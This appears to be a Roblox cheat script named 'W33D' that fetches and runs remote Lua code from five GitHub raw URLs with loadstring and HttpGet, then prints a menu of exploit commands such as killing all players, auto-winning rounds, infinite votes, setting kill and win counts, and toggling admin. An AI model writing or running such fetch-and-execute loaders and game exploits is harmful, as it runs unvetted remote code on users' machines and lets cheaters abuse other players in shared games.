loadstring(game:HttpGet("https://raw.githubusercontent.com/TRASHUX/K1LD/main/lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TRASHUX/K1LDD/main/lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TRASHUX/K1LDDD/main/lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TRASHUX/K1LDDDD/main/lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TRASHUX/K1LDDDDD/main/lua"))()

print("")
print("Script: W33D")
print("Version: 3.0")
print("Prefix (.)")
print("")
print("-> kill all/others/me OR anyone's display/username <-")
print("-> win round OR win game <-")
print("-> infv OR infv auto true/false = infinite votes (YES) <-")
print("-> kills/wins/shells (number) <-")
print("-> admin true/false (BAN) risk <-")
print("-> serverhop <-")
print("")
